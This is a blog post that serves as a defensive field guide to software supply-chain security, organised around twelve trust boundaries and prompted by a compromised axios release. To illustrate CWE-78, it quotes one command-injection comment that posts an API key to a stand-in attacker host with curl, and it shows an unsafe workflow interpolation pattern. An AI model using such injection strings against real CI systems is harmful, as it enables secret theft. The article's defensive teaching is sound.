DEV Community: Ahmad Kanj

Twelve Trust Boundaries: A Field Guide to Supply-Chain Defense After axios@1.14.1

Ahmad Kanj — Fri, 08 May 2026 12:48:03 +0000

On March 30, 2026, an attacker who had stolen an axios maintainer's npm publish credentials pushed axios@1.14.1 to the registry. The version looked like a normal patch, a single-digit bump from 1.14.0. It was live for roughly three hours before the maintainer rotated credentials and the version was unpublished.

Three hours, on a Monday, during peak CI/CD hours across multiple time zones. Any team running pnpm install or npm install against a ^1.14.0 constraint pulled 1.14.1 automatically. (^1.14.0 means "any 1.x.y ≥ 1.14.0"; most package managers express the same idea: ~= in pip, ^ in Cargo, ~> in Gemfile.) No CVE was published during the window. SAST tools had nothing to flag.

axios@1.14.1 added one new transitive dependency (a dependency-of-a-dependency, pulled in indirectly): plain-crypto-js@4.2.1. That package's postinstall script ran node setup.js, which downloaded a Python-based RAT (Remote Access Trojan) from a C2 (command-and-control) server, exfiltrated environment variables and cloud credentials, and attempted to establish persistence on the build host. (postinstall is the canonical Node footgun, a hook the package manager runs automatically after install, with analogues in pip's setup.py build hooks, Ruby's gem extconf, and Cargo's build.rs.) The compromise wouldn't have been visible to anyone glancing at the lockfile diff: a new transitive in a stable utility, the kind of churn most teams approve without thinking.

Three hours is forever in CI. By the time npm pulled the version, the bytes had already shipped to thousands of build hosts.

Two weeks before that incident, I was reading through a workflow in our own repo that lets engineers trigger an LLM code review by commenting /review on a pull request. I stopped on this line:

# .github/workflows/opencode-review.yml:108
COMMENT_BODY="${{ github.event.comment.body || '' }}"

The if: block above it gated only on startsWith(comment.body, '/review'). There was no comment.author_association check. Anyone who could comment on a PR, including a drive-by from a public fork, could trigger this workflow. The job loaded OPENROUTER_API_KEY from AWS Secrets Manager, and ran with pull-requests: write, issues: write, and AWS OIDC (OpenID Connect short-lived workload identity, used here instead of long-lived API keys) in scope.

A comment body of /review"; curl -X POST attacker.example/x -d "$OPENROUTER_API_KEY would have run on the next CI build. CWE-78: OS command injection, untrusted input concatenated into a shell command. Found, scoped, fixed in a four-line diff.

Two attacks, very different mechanics. axios was a credential-theft → publish → postinstall chain at the registry boundary. The CWE-78 was a comment-string interpolation at the workflow boundary. The connection: in both cases the attacker didn't write code "in" the repo. They injected code by abusing a trust relationship. We trusted axios's npm releases; we trusted GitHub event input. The perimeter is no longer your application. It's everything that runs before, during, and after your build, and the defense has to live in those same places.

I work on a monorepo spanning multiple projects (a single git repository hosting many services and libraries, JavaScript and TypeScript in our case, but the framework below maps to any monorepo or polyrepo, any language). A month after axios@1.14.1 shipped, a Slack message landed in our channel: "we have Wiz, SonarCloud, gitleaks, Renovate, but are we good?" Seven days later I had a triaged P0/P1/P2 list (12 P0s on auth, secrets, registry trust; 18 P1s on pinning, permissions, lifecycle; 17 P2s on logging, SBOM, hardening) and a branch with 48 files changed and +2,487 / −646 lines of supply-chain controls.

What follows is the framework I use, the specific findings I hit, the trade-offs I made, and the equivalent control in your stack, whether your repo is npm, pip, Maven, Go modules, Cargo, or RubyGems; whether your CI is GitHub Actions, GitLab, Buildkite, or Jenkins. The worked example here is pnpm and GitHub Actions because that's where I shipped it. The boundaries are stack-neutral.

Where the attack surface actually lives now

Your application's attack surface is bounded. A handful of endpoints, an auth system, a database. You can audit it, pen-test it, threat-model it on a whiteboard in an afternoon.

Your supply chain is not bounded. It's the transitive closure of every package you import, every CI Action / GitLab include / Buildkite plugin in every workflow, every base image FROM line in every Dockerfile, every binary your CI runner downloads at build time, every preset, every fork, every "trusted" community helper.

The math doesn't work in your favour. A typical mid-sized application resolves on the order of 1,000–3,000 transitive dependencies in its lockfile (the resolved-versions file your package manager writes: package-lock.json, Pipfile.lock, Cargo.lock, Gemfile.lock, go.sum). A typical CI pipeline chains 10–30 third-party Actions / plugins. Across a multi-year horizon, the probability that none of those maintainers gets phished, social-engineered, or leaks a publish token approaches zero.

Recent incidents to anchor frequency:

2018: event-stream (npm advisory 737): maintainer handed package to a malicious "helpful contributor" who added a payload in a sub-dependency. Targeted exfiltration of private keys from the Copay/copay-dash Bitcoin wallet specifically; conditional payload, no effect on other consumers.
2021: ua-parser-js: npm account takeover. Crypto miner and credential theft on every install. ~4 hours before takedown.
2021: codecov bash uploader (CVE-2021-32699): modified upload script harvested CI environment variables. HashiCorp, Twilio, Confluent affected.
2022: node-ipc (CVE-2022-23812): maintainer protestware. Wiped files on Russian and Belarusian IPs.
2024: xz-utils (CVE-2024-3094): multi-year insider. The "Jia Tan" persona spent ~2 years building trust before merging an OpenSSH authentication backdoor via liblzma linkage with a specific Ed448 key. Discovered by Postgres engineer Andres Freund investigating ~500 ms of sshd login latency, before the affected versions reached most stable distributions.
2024: @solana/web3.js (GHSA-7493-mqf3-cv5g): npm token compromise. Wallet drainer in published versions for ~5 hours.
2025: tj-actions/changed-files (CVE-2025-30066): chained through reviewdog/action-setup (CVE-2025-30154) → stolen PAT → retroactive semver-tag rewrite. ~218 repos confirmed leaked secrets out of ~23,000 references per StepSecurity / Wiz post-incident telemetry.
2025: Shai-Hulud npm worm: the first true self-replicating npm worm. A postinstall harvested maintainer npm tokens and re-published the worm into every other package the victim maintained. ~180 packages compromised across multiple maintainer namespaces.
2025: Nx s1ngularity worm: npm postinstall on compromised Nx versions harvested GitHub PATs, SSH keys, and crypto wallets from build hosts; backdoored downstream nx-init- repositories. Directly relevant to anyone on an Nx monorepo.
2026: axios@1.14.1: as above.

Strip the variations and you get four primitives that every modern attack chains: dependency injection (typosquats, dependency confusion, maintainer compromise), build-time injection (postinstall hooks, curl-bashed installers, malicious Actions), mutable-reference rewrite (tag rewrites, branch tracking, CDN URLs without integrity), and trust-relationship abuse (compromise a tooling vendor, an MFA, a token in a CI log). axios chained (4) → (1) → (2). tj-actions chained (4) → (1) → (3) → (2). Any single layer of defense would have broken either chain. Most repos had none of them.

The twelve boundaries

Security engineers think in boundaries: points where trust transfers from one entity to another. Each boundary is a place attackers operate and a place defenders need a control. The twelve below split into three phases: what enters your repo (1–4); what runs during your build (5–9); what ships at runtime (10–12); plus a final section on what to do when one of them fails. Some will.

Phase 1. Source-side: what enters your repo

Boundary 1: Source → Repository (Who can write to `main`?)

Threat: insider with too-broad write access; accidental merge of malicious code.
Controls: branch protection, required reviewers, CODEOWNERS for security-sensitive paths (workflows, Dockerfiles, dependency manifests). Force-push protection on protected branches. Required status checks must include the controls below.

The forge-level (GitHub / GitLab / Bitbucket / Gerrit) primitives differ; the rule is identical: humans cannot push to main; only the merge bot can, and only after policy passes.

Boundary 2: Maintainer → Package (Is this dependency safe?)

Threat: typosquats, dependency confusion (publishing a public package whose name shadows a private one, tricking the resolver), maintainer compromise. axios@1.14.1 is the canonical example of the third: published from a stolen credential, malicious for three hours, gone afterwards.

Registry-time controls:

Pin to immutable identifiers. Lockfile committed; exact-version constraints; no caret/tilde ranges in production dependencies; pnpm install --frozen-lockfile (or npm ci, pip install --require-hashes, cargo --frozen --locked, mvn -B verify, bundle install --frozen, dotnet restore --locked-mode) in CI. The general invariant: every dependency entry resolves to a content-addressed artifact, not a URL.
Cooldown on freshly published versions. Reject packages younger than N days, on the premise that fresh-publish malware is detected and yanked within 24–72 hours. The premise has limits (xz-utils ran for ~2 years undetected), so this control buys hours-to-days of latency, not certainty.

   # pnpm-workspace.yaml. value is in minutes; 4320 min = 72 h = 3 days
   minimumReleaseAge: 4320

axios@1.14.1 was unpublished within three hours. With minimumReleaseAge: 4320, pnpm would have refused to install it for 72 hours after publish. By the time the install would have unblocked, the malicious version was already gone.

Stack-neutral: pnpm has this natively. Renovate's minimumReleaseAge config covers any ecosystem Renovate manages: npm, Maven, PyPI, Go, Cargo, NuGet, RubyGems, Helm, Docker, GH Actions, Terraform. For stacks without native or Renovate support, layer reputation signals: Socket (behavioural risk score), Phylum (heuristic quarantine), OSV-Scanner + EPSS scores for exploit-likelihood prioritisation, OpenSSF Scorecard for upstream maintenance health, npm audit signatures for registry signature verification.

Provenance. Where available, prefer packages published with provenance attestations. npm publish --provenance (since npm 9.5) records a signed Sigstore provenance entry binding the published tarball to the GitHub Actions workflow that built it. PyPI Trusted Publishers + PEP 740 attestations are the Python equivalent. Maven Central PGP signatures + sigstore-maven-plugin for Java. Provenance doesn't stop a credential-theft attack like axios (the malicious workflow would still produce a signed entry), but it gives forensics a starting point.

Boundary 3: Registry → Lockfile (Is the resolved artifact what we think it is?)

Threat: registry compromise, off-registry tarballs without integrity, mid-flight tampering.

Controls: lockfile committed; integrity hash (sha512:, sha256:, OCI digest) on every entry; CI install command refuses to mutate the lockfile. Easy thing to miss: a lockfile entry like tarball: https://cdn.somehost.com/foo.tgz without an integrity: field is functionally trust-the-CDN. Whoever serves that URL can serve different bytes tomorrow than they served today, and your install will accept them. Audit yours for entries where the hash field is empty or pointing to a URL the registry doesn't verify.

# tools/scripts/verify-supply-chain.sh runs in CI.
# Fails if the lockfile contains any off-registry tarball not on this allowlist.
EXPECTED_TARBALLS=(
  "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz"  # SheetJS withdrew xlsx from npm in 2023
)

This single grep-equivalent check would also have flagged the axios@1.14.1 situation early in retrospect: a brand-new transitive (plain-crypto-js@4.2.1) appeared in the lockfile diff. A mandatory PR-time review on lockfile additions catches what the eye doesn't.

The general invariant translates: pip's --require-hashes, Cargo's checksum field, Maven's --strict-checksums, NuGet package signing, Go's module sum database. Every modern package manager has the primitive. The discipline is auditing for entries where it isn't enforced.

Boundary 4: Install → Lifecycle scripts (What runs on install?)

Threat: malicious lifecycle hooks. The axios attack's payload ran here. plain-crypto-js@4.2.1's entire malicious behaviour was a postinstall: node setup.js. Without that hook, the package would have sat on disk doing nothing until something require()'d it, and axios doesn't import plain-crypto-js. The postinstall was the only thing that turned a passive disk write into RCE during install.

Controls:

Default-deny on install scripts, allowlist of who may run them:

   {
     "pnpm": {
       "onlyBuiltDependencies": [
         "esbuild",
         "@swc/core",
         "@datadog/native-iast-taint-tracking",
         "prisma"
       ]
     }
   }

plain-crypto-js would not have been on any team's allowlist. pnpm install --ignore-scripts (read-only CI workflows) and onlyBuiltDependencies (pnpm 10) each, independently, neutralise the postinstall vector.

Behavioural quarantine. Socket and Phylum analyse new transitives for suspicious patterns (network calls, file-system access, dynamic eval) before they reach your lockfile. npq wraps npm install to prompt before installing freshly published packages. None of these would catch a sufficiently subtle payload, but plain-crypto-js's node setup.js → C2 download is exactly the shape they flag.
Build-host sandboxing. Run installs inside an ephemeral container with no network egress except to the registry; or use Bubblewrap / Firejail / Chainguard's hardened images. Defence-in-depth for the case where the lifecycle gate fails open.

The limit: lifecycle gates block preinstall / install / postinstall. They do not prevent module-load-time top-level execution when an attacker-controlled package gets require()'d or import'd during vitest, tsc, eslint, or any other tool that imports your code graph. The minimumReleaseAge cooldown (Boundary 2) is the layer behind that.

Stack equivalents: pip's risky surface is setup.py install hooks (mitigate with --only-binary=:all:); Ruby's is gem install running extconf.rb; Cargo's is build.rs (sandbox via Bazel rules_rust or cargo-deny bans); .NET's modern PackageReference does not run scripts (legacy packages.config does); Maven's and Gradle's are build plugins (audit <build><plugins> and buildscript { dependencies }).

Phase 2. Build-side: what runs during your build

Boundary 5: Source → Image (Is our build environment trustworthy?)

Threat: base image tag rewrite, secrets baked into image layers.
Controls:

Pin every FROM by @sha256:<digest>. Tags are mutable; digests are content-addressed (the SHA changes if the bytes change, so a rewrite is detectable).

   FROM node:20.11.1-alpine3.19@sha256:735dd688da64d22ebd9... AS base
   USER node
   CMD ["node", "dist/main.js"]

Drop privileges with USER before CMD. For Node images: USER node. For nginx: switch to nginxinc/nginx-unprivileged (drop-in non-root replacement listening on 8080).
Never put secrets in ARG defaults: they persist in docker history. Use BuildKit --mount=type=secret for build-time secrets.
Hermetic builds for the highest tier. Bazel rules_oci, Nix dockerTools, Chainguard's apko + melange produce reproducible images where every byte is content-addressed back to source. Overkill for most teams; required for SLSA L3+.

Boundary 6: Image → Registry (Can downstream verify what we shipped?)

Threat: image tag rewrite at the registry; image swap; "did we actually ship this build?" forensics gap.

Controls: cosign keyless signing via Sigstore. Sigstore is a free signing service; Fulcio is its short-lived certificate authority; Rekor is its public transparency log; the SET (Signed Entry Timestamp) is Rekor's tamper-proof timestamp binding the signature to a moment when the cert was still valid. GitHub Actions OIDC issues a short-lived signing identity, Fulcio mints a certificate valid for ~10 minutes, and the signature is recorded in Rekor.

Treat Rekor as load-bearing, not optional. The Fulcio cert expires almost immediately; what makes a keyless signature verifiable hours or years later is the Rekor inclusion proof. A cosign verify that doesn't check the SET is meaningless after cert expiry.

Verify with workflow-path anchoring, not a loose org regex:

cosign verify <image>@<digest> \
  --certificate-identity-regexp "^https://github\.com/yourorg/yourrepo/\.github/workflows/release\.yml@refs/heads/main$" \
  --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
  --certificate-github-workflow-repository "yourorg/yourrepo" \
  --certificate-github-workflow-ref "refs/heads/main"

An open ^https://github.com/yourorg/ regex matches any workflow under the org, including a malicious workflow added in a fork and run via pull_request_target. Anchor on the workflow path, the ref, AND test the regex with a known-different workflow before relying on it. Unanchored regexes (missing ^ or $) match more workflows than you intended.

Signing alone does not satisfy SLSA (Supply-chain Levels for Software Artifacts, a framework grading build provenance trustworthiness). The signature proves who built the image, not how. SLSA Build L3 requires provenance attestations in in-toto format (https://slsa.dev/provenance/v1 predicate), produced by cosign attest --predicate from a hardened, isolated builder such as slsa-github-generator. Verify with cosign verify-attestation. The signature is the foundation. The attestation chain is the rest of the building.

A signature you don't verify at deploy time is theatre. Wire cosign verify into a Kubernetes admission controller (Kyverno verifyImages, Connaisseur, or Sigstore policy-controller) so the cluster refuses to schedule unsigned or wrong-identity images. GitHub's native gh attestation verify (GA 2024) is the simplest verification entry-point if you're not on Kubernetes.

Stack-agnostic: cosign works on any container image registry (ECR, GHCR, ACR, GAR, Harbor, Artifactory, Quay) and on generic blobs via cosign sign-blob. Sigstore Fulcio currently trusts OIDC issuers from GitHub, GitLab, Buildkite, CircleCI, Google, Microsoft. Same cosign sign --identity-token flow, different iss claim. PEP 740 attestations + python -m sigstore cover Python wheels; sigstore-maven-plugin covers Java JARs.

Boundary 7: Tag → Commit (What does this `uses:` / include / plugin actually point to?)

This is the boundary tj-actions exploited. A line like uses: tj-actions/changed-files@v45 resolves at build time to whatever commit the v45 tag currently references. Tags are mutable. Commit SHAs are not.

Controls: pin every external uses: to a 40-character commit SHA with a tag comment.

- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
- uses: pulumi/actions@8582a9e8cc630786854029b4e09281acd6794b58 # v6

Enforce in CI with pinact run --check --verify. It fails the PR if anything is unpinned, and flags drift between the pinned SHA and the SHA the upstream tag currently resolves to. It catches inadvertent drift. It does not by itself defeat a tag-rewrite attack. pinact will surface the mismatch but cannot tell you which side is hostile. Pair it with a higher-trust signal: Sigstore attestation verification, GitHub's gh attestation verify for Action artifacts (GA 2024), StepSecurity Harden-Runner for egress-policy + tampering detection on the runner, or human review of any flagged drift.

When we started, none of our 110 uses: lines were SHA-pinned. That included pulumi/actions (cloud-deploy authority), lasith-kg/dispatch-workflow (single maintainer), aws-actions/configure-aws-credentials (×11), and docker/build-push-action (×3, ECR push). They all are now, with a CI gate so they stay that way.

Translate to your CI: GitLab include: should pin ref: to a SHA, not main. Buildkite plugins should pin plugin@<sha>, not @v1. CircleCI orbs are best inlined or vendored. Jenkins shared libraries should pin @Library('foo@<sha>'). Bazel modules pin via MODULE.bazel.lock. The control: no mutable references to third-party code anywhere in CI config.

Boundary 8: Workflow → Secrets (What can a single compromised step exfiltrate?)

Threat: any step in a workflow inherits the workflow's permissions and any environment-scoped secrets. A compromised Action running with permissions: write-all receives a GITHUB_TOKEN with write scopes across that repository's API surface (contents, issues, pull requests, packages, deployments) for the duration of that workflow run.

Controls: default-deny at workflow level, grant per-job:

permissions: {}

jobs:
  deploy:
    permissions:
      contents: read       # for checkout
      id-token: write      # for AWS OIDC

zizmor (free workflow-security linter) audits this on every PR. When we ran it the first time, 8 of our 16 workflows were running permissions: write-all. Today none of them do.

Reusable workflows (workflow_call) inherit the caller's permissions: unless explicitly overridden. secrets: inherit on the caller hands every repository secret to the callee. Pass secrets explicitly by name and re-declare permissions: in every reusable workflow.

pull_request_target is the single highest-severity GitHub Actions footgun. Unlike pull_request, it runs in the context of the base repository with the base repo's GITHUB_TOKEN and access to repository secrets. If you actions/checkout the PR head, you've executed an attacker's code with privileged credentials. Default rule: never check out PR head code in a pull_request_target workflow; never run third-party scripts inside one.

Replace long-lived AWS keys with GitHub OIDC. The role's trust policy restricts assumption to your repository's workflows; CI never holds a credential that survives the run. The footgun: a sub condition like repo:org/*:* hands AWS-role assumption to any workflow run from any branch, including a fork's PR. Anchor sub to a specific repo + ref:

"Condition": {
  "StringEquals": {
    "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
  },
  "StringLike": {
    "token.actions.githubusercontent.com:sub": "repo:yourorg/yourrepo:ref:refs/heads/main"
  }
}

Note that anchoring to refs/heads/main still lets any push to main assume the role: fine for a build-and-test role, too permissive for a production-deploy role. For deploy roles, anchor to a tag pattern (ref:refs/tags/v*) or to a GitHub Environment with required reviewers. For higher precision than sub, use job_workflow_ref. It constrains to a specific leaf workflow file and is resilient to a malicious reusable-workflow caller inside the same repo. AWS, GCP Workload Identity Federation, and Azure federated credentials all expose it.

CI translations: GitLab CI uses id_tokens: per-job and CI/CD job-token scope allowlists; Buildkite uses agent-queue ACLs and Vault Agent for secret distribution; CircleCI uses restricted contexts; Jenkins uses withCredentials per-step plus folder-level credential isolation. Different YAML, same default-deny pattern.

Boundary 9: Untrusted input → Shell (CWE-78 in CI)

Threat: GitHub-context fields like github.event.comment.body, pull_request.title, head_ref are attacker-controlled. When interpolated directly into a run: block, they become shell injection. The same class exists everywhere: GitLab $CI_* from triggered events, Jenkins parameterised builds, Buildkite meta-data, Azure variables.

Unsafe:

run: echo "Reviewing: ${{ github.event.comment.body }}"

Safe:

env:
  BODY: ${{ github.event.comment.body }}
run: echo "Reviewing: $BODY"

This is the boundary the lede sat on. The fix was a four-line diff. The control that catches the next one (actionlint for syntax + zizmor for security patterns, both as required PR checks) was one commit. Cross-CI: semgrep --config=p/ci covers most major vendors with one ruleset.

Phase 3. Runtime-side: what ships and what leaks

Boundary 10: Build host env → Client bundle (Whose secrets ship to the browser?)

Threat: a define block in your bundler (Vite, Webpack, esbuild, Rollup) that spreads process.env into the client bundle. Frontend bundlers replace process.env.X with the value at build time, so whatever was in the build host's env becomes a string literal in the JS shipped to every browser.

We had this:

// vite.config.ts
define: {
  'process.env': process.env,   // TODO: fix this later
},

Safe:

define: {
  'process.env.PUBLIC_API_URL': JSON.stringify(process.env.PUBLIC_API_URL),
  // explicit allowlist; nothing implicit
},

Same principle for NEXT_PUBLIC_*, VITE_*, REACT_APP_*, EXPO_PUBLIC_* env vars: assume browser-readable, never put secrets behind these prefixes. Same failure mode in mobile too: Android BuildConfig.API_KEY = "$apiKey" from a checked-in gradle.properties; iOS API keys in Info.plist or xcconfig. Assume any string in the artefact is extractable.

Boundary 11: Runtime → Logs (Are your sinks an exfiltration channel?)

Threat: logging frameworks default to verbose. CloudWatch, Datadog, Sentry retain log lines for weeks. A console.log(req) in a request handler dumps the Authorization header to a 30-day-retention log, accessible to any engineer with read access.

Controls: redaction at the framework level (not per call-site):

import pino from 'pino';

export const logger = pino({
  redact: {
    paths: [
      'req.headers.authorization',
      'req.headers.cookie',
      'config.headers.authorization',  // catches Axios errors
      '*.password', '*.token', '*.secret',
    ],
    censor: '[REDACTED]',
  },
});

The one that bit us: AxiosError objects carry the original request configuration, including Authorization headers. logger.error(msg, axiosErr) without redaction quietly dumps every bearer token your service has ever forwarded.

Every mature logger has the primitive: structlog processors (Python), logback's MaskingPatternLayout (Java), zap / zerolog field hooks (Go), tracing field filters (Rust), Rails.config.filter_parameters (Ruby), Serilog.Enrichers.Sensitive (.NET). Last line of defence regardless of stack: an OpenTelemetry Collector with an attributes/delete processor that scrubs in transit before logs reach Datadog or CloudWatch.

The limit. pino redact is a denylist; it only scrubs the paths you list. Custom auth headers (x-api-key, x-vault-token), GraphQL variables.password, request.body.token, provider-specific shapes are all easy to miss. Audit your redact paths against the actual headers and body shapes your services see, and re-audit when you add an integration.

Boundary 12: Dependency → Patch (Can you fix a CVE without a registry round-trip?)

Threat: vulnerable transitive dependency, no maintainer response, can't wait.

Controls: force-pin the transitive with documented rationale and an expiry date:

{
  "pnpm": {
    "overrides": {
      "lodash-es": "4.17.23",
      "tar": "7.5.11"
    }
  }
}

Every package manager has the primitive: npm overrides, yarn resolutions, pip constraints.txt, Poetry direct-promotion, uv [tool.uv] override-dependencies, Maven <dependencyManagement>, Gradle resolutionStrategy.force, Cargo [patch.crates-io], Go replace, Bundler direct gem pin, NuGet central package management.

Override-rot is real: outdated overrides shadow newer transitive versions that already have the fix. Each override should reference its CVE, the introducing PR, and a re-evaluation date. The audit-allowlist.json schema we use:

{
  "ghsa": "GHSA-xxxx-yyyy-zzzz",
  "package": "the affected package",
  "severity": "high | critical",
  "rationale": "why this risk is accepted (must explain reachability or absence of fix)",
  "verified_by": "engineer email or handle",
  "added": "YYYY-MM-DD",
  "expires": "YYYY-MM-DD",  // max 90 days
  "follow_up": "what removes this entry"
}

CI fails when expires passes; the gate forces a re-decision rather than letting drift accumulate.

When prevention fails: the response side

Every boundary above is preventive. Some will fail. The question is what you do in the next four hours.

Forensic record. Retain CI build logs for at least 90 days, forwarded to an immutable sink (S3 with object lock, or a logging platform with retention). Without this, "did the malicious axios version run for us during the window?" is unanswerable. GitHub-hosted runners are ephemeral; once a job finishes, the host is gone. Pre-configure log shipping and an artifact upload of suspicious-run state.

Provenance lookup. rekor-cli search --artifact <digest> answers "did our pipeline sign this digest?" gh attestation verify answers it for GitHub-attested artifacts. OSV-Scanner retroactively queries your lockfile against advisory windows ("did we have axios 1.14.x in a build between March 30 12:00 UTC and 15:00 UTC?"). GUAC (Graph for Understanding Artifact Composition) builds a queryable provenance graph across artifacts. Trivy + Grype drive SBOM-based scanning post-incident; Dependency-Track is the consumption side. An SBOM you don't continuously diff against vulnerability feeds is a compliance artefact, not a control.

OIDC token revocation playbook. Know how to invalidate cached OIDC subject claims. Know which AWS role trust policies to tighten. Know how to query Sigstore Rekor for "did we sign this digest during the suspect window?" All process documentation, not tooling.

Secret rotation in dependency order. If CI is suspect, rotation order matters. Start at the leaves (npm publish tokens, third-party SaaS keys), then deploy roles, then DB credentials. Rotating root credentials first invalidates the OIDC tokens you'd need to rotate the leaves. Document who calls whom; security incidents are a bad time to discover ambiguity.

Image quarantine. ECR lifecycle policy plus an admission-controller tag-block on the suspected window's digests. Until your cosign verify says the digest you're running is the digest you signed, treat anything from that window as suspect.

Prevention buys time for detection. Detection buys time for response. Get all three in writing before you need them.

What one week of focused work actually moved

Control	Before	After
Third-party Action SHA pinning	0% of 110 `uses:` lines	100% with `pinact` CI gate
Workflow `permissions: write-all`	8 of 16 workflows	0
Lockfile integrity coverage	99.97% (1 off-registry tarball, no `integrity:`)	99.97% + CI allowlist enforcement with rationale per off-registry entry
`minimumReleaseAge`	12 hours	3 days
Production Dockerfile USER directive	0 of 7 (all root)	7 of 7 (non-root)
Production base image digest pinning	0 of 7	7 of 7
Image signing	none	cosign keyless on every ECR push, workflow-path-anchored verify identity
PR-time secret scanning	pre-commit only (skippable)	pre-commit + CI (unskippable)
PR-time SAST	none	CodeQL `security-extended`
Workflow security audit	none	`actionlint` + `zizmor`
Dependency CVE gate	none	`pnpm audit --prod --audit-level high` with documented allowlist
SBOM generation	none	CycloneDX + SPDX on every push to main

The week wasn't a checklist. It was a sequence of specific findings, in the order I hit them:

Day 1: Boundary 7. Audit of .github/workflows/. Every external uses: was tag-pinned. Pinned all 110 to 40-character SHAs with tag comments. pinact run --check --verify added as required status check.
Day 1: Boundary 8. 8 of 16 workflows ran with permissions: write-all. Tightened to workflow-level permissions: {} plus per-job grants. zizmor added as the gate. First staging deploy broke because permissions: {} revealed an undeclared packages: read that a publish job had been silently inheriting through the old write-all. Caught in PR; one-line add to per-job permissions.
Day 2: Boundary 9. The opencode-review.yml:108 CWE-78 (the lede). Four-line fix.
Day 2: Boundary 10. apps/front/remote-homepage/vite.config.ts:30 had 'process.env': process.env, with a TODO comment. Every CI environment variable visible to the build host was being baked into the client bundle. Replaced with an explicit allowlist.
Day 3: Boundary 8. build-and-publish-service.yml lines 128 and 469: both Wiz container scan steps had continue-on-error: true || true. Doubly non-blocking. Two engineers had deliberately typed those bypasses; this wasn't config drift. Removed both.
Day 3: Boundary 3. Lockfile audit found one off-registry tarball: https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz, in two lambda package.json files. Allowlisted with rationale (SheetJS withdrew xlsx from npm in 2023).
Day 4: Boundary 12. pnpm.overrides audit; the lodash story below.
Day 4: Boundary 2. minimumReleaseAge calibration: started at 720 minutes (12 hours), tried 10080 (7 days), got blocked by a postcss@8.5.12 patch published four days earlier, settled at 4320 (3 days).
Day 4: Boundary 5. Production Dockerfile sweep. 7 of 7 images ran as root. Added USER node; switched nginx-fronted images to nginxinc/nginx-unprivileged.
Day 5: Boundary 6. Cosign keyless signing on every ECR push. Branch protection updated to require all six new gates as status checks.

The DX cost, honestly. PR-time latency went from p50 4m / p95 9m to p50 6m / p95 14m. CodeQL security-extended is the long pole at ~7m. False-positive rate after the first week of tuning: zizmor ~5%, gitleaks ~2% with the project-tuned config. Two engineers asked for a --no-verify escape hatch on pinact early on; we declined. One pushed back hard enough that I owed him a 1:1 walking through the tj-actions chain. The friction is real and you should plan for the conversation. Fast-path bypass: a security-bypass label requires CODEOWNERS approval, expires on merge, audit-logged.

Five lessons that don't fit in a framework

1. The "patched version" you find in an advisory is not always the version you can ship.

Day 4. The advisory for GHSA-r5fr-rjxr-66jc (HIGH, code injection via _.template) said "fixed in 4.18.0." Our pnpm.overrides had lodash-es: 4.18.0 and lodash: 4.18.1, both flagged green by the advisory.

Then I checked the npm registry page. 4.18.0 was marked as a deprecated "Bad release." We were pinned to a withdrawn version, which is its own kind of supply-chain debt. The current stable was 4.17.23. The patch wasn't in it.

I kept the terminal open and ran:

grep -rE '_\.template\(' apps/ libs/

Nothing. Across multiple projects, no production source called _.template. The vulnerable code path was unreachable.

That grep is a hand-rolled approximation of reachability analysis, the formal name for "is the vulnerable function actually called from your code?" Tools that automate it: Endor Labs, Snyk Reachability, Semgrep Supply Chain, CodeQL with taint-tracking queries. Eleven seconds with grep is the cheap version of the same idea. The expensive version costs money but covers transitive call paths grep can't see.

The decision crystallised: allowlist with documented rationale, three-month expiry, named follow-up to migrate off lodash entirely.

Three months from now the entry expires. CI fails again. Someone re-runs the grep and decides: still unreachable, renew? Or has someone added _.template to a new feature, in which case the override is no longer safe. Either way, the decision happens. That's the difference between an allowlist with an expiry and an eslint-disable-next-line that lives forever.

2. Aggressive controls block legitimate fixes. Calibrate, don't posture.

Started at minimumReleaseAge: 10080 (7 days, pnpm's recommended baseline). Within the hour it blocked postcss@8.5.12, a CVE patch published four days earlier. Dropped to 3 days.

The "right" number depends on your workload. A healthcare-staffing platform tolerates 72 hours of CVE-patch latency more easily than fintech tolerates 12. Write down why you picked the number. Three days catches the noisy fast attacks (axios, ua-parser-js, @solana/web3.js were all yanked in <5 hours). It does not catch the patient ones (xz-utils ran 2 years; Shai-Hulud's worm re-publishes from already-trusted maintainer accounts can outlast any cooldown). minimumReleaseAge is a layer, not the wall.

3. Detection without enforcement is not security.

The week started with the Slack message above. The most striking finding: every right primitive was already there: Wiz, SonarCloud, Renovate, gitleaks, custom rules. None of them were blocking merges. Wiz container scans were running with continue-on-error: true || true. SonarCloud ran post-merge. Pre-commit gitleaks could be skipped with --no-verify. Renovate filed PRs nobody was required to merge.

Moving those gates into PR-time required-status-checks (same tools, same configurations, just required: true in branch protection) was, in my judgment, the largest delta in actual risk reduction over the week. It's a judgment, not a measurement; we don't have a counterfactual. Take it as senior intuition.

4. The blast radius of a CI compromise is usually larger than any application bug.

An app bug leaks data. A CI compromise leaks everything that has ever run through CI: AWS credentials, deploy keys, npm tokens, signing keys, source code, SBOMs, any customer-data backup that happened to touch a build step. Treat CI/CD like production, because it has the same blast radius.

5. These controls assume a clean threat model. Both halves of that assumption fail.

Most of the controls above assume the attacker is outside your org and your developers' laptops are clean. Both fail in roughly half the supply-chain incidents I've seen written up. xz-utils is the canonical maintainer-side case: a multi-year insider with valid signed commits. Every Phase 1 control passes. A compromised developer endpoint with a valid signed-commit identity bypasses CODEOWNERS, branch protection, and most of Phase 1. Endpoint posture and maintainer-identity verification are their own conversations. When you decide what to ship next, factor them in.

Process and culture

Tools alone don't get you there. The process around them ends up doing more of the work than I'd expected. Three patterns that bound everything else:

CODEOWNERS on every supply-chain surface. Required reviewer on every workflow file, Dockerfile, dependency manifest, override file, and audit-allowlist.json itself. Humans catch what static analysis can't see (intent, weird ownership, deprecated-but-popular packages); machines catch the rest.
Allowlists with expiry, never silent ignores. Every accepted risk has rationale, verifier, and a date when it stops being accepted. CI fails at expiry and forces a re-decision rather than letting drift accumulate.
Default-deny as engineering culture. permissions: {} at workflow level. Empty Dockerfile USER rejected. New dependency needs CODEOWNERS approval. Off-registry tarball needs written rationale. The friction surfaces decisions that would otherwise stay implicit.

When zizmor flags a workflow, gitleaks catches a token, or an audit advisory blocks a merge, the response is "what process let this through?" not "who put it there?" The first question gets you better controls. The second one gets you quieter engineers.

What you can ship alone vs. what needs platform

Half the controls above can be adopted by a single team owning a single repo. The other half need platform / security-org buy-in. The trap is adopting the team-side half without the platform-side half. You eat the friction without the protection.

